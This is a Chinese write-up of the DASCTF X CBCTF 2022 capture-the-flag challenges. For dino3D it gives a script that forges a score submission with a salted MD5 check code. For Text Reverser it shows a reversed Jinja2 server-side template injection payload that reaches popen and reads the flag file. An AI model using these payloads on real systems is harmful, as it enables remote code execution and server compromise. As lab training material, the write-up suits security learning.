DASCTF X CBCTF 2022九月挑战赛

期中考结束了有点时间，做点题熟一下手，欢迎讨论

dino3D

审计源码
找到了发送请求的部分

import requests
from hashlib import md5
import time
target = "http://node4.buuoj.cn:29625/check.php"

headers = {
    "Content-type": "application/x-www-form-urlencoded; charset=UTF-8"
}


body = {
    "score": "10000000",
    "checkCode": md5("10000000DASxCBCTF_wElc03e".encode()).hexdigest(),
    "tm": str((time.time()))[:10]
}


res = requests.post(target, headers=headers, data=body)
print(res.text)

得到flag

Text Reverser

{{}}和反转后的}}{{都被ban了,
但似乎没有对反转后的字符串进行检测，那么可以随便进行ssti注入啦
找一下能利用的类

import requests
from bs4 import BeautifulSoup
import re

evalC = ["warnings.catch_warnings", "WarningMessage", "codecs.IncrementalEncoder",
         "codecs.IncrementalDecoder", "codecs.StreamReaderWriter", "os._wrap_close", "reprlib.Repr", "weakref.finalize"]
popenC = ["os._AddedDllDirectory", "os._wrap_close"]

target = "http://ad4abcf2-c3cc-4f81-a64c-2c75f15429d8.node4.buuoj.cn:81/"

rce = '{% print "".__class__.__bases__[0].__subclasses__()%}'
rce = rce[::-1]
body = {
    "text": rce,
}

res = requests.post(target, data=body)
q = BeautifulSoup(res.content, "lxml")
classes = str(q.p)

classes = re.sub("'", "", re.sub(" class ", "", re.sub(
    "&...", "", re.sub("<p>.........", "", re.sub("]</p>", "", classes)))))
classlist = classes.split(",")
index = 0

print(classlist)

for i in classlist:
    if i in popenC:
        print(index, i)
    index += 1

发现有能执行popen()方法的os._wrap_close
反转下面的payload就拿到flag了
{% print "".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('nl /flag').read()%}

zzz_again

看了一晚上头已经要炸了，好变态的代码审计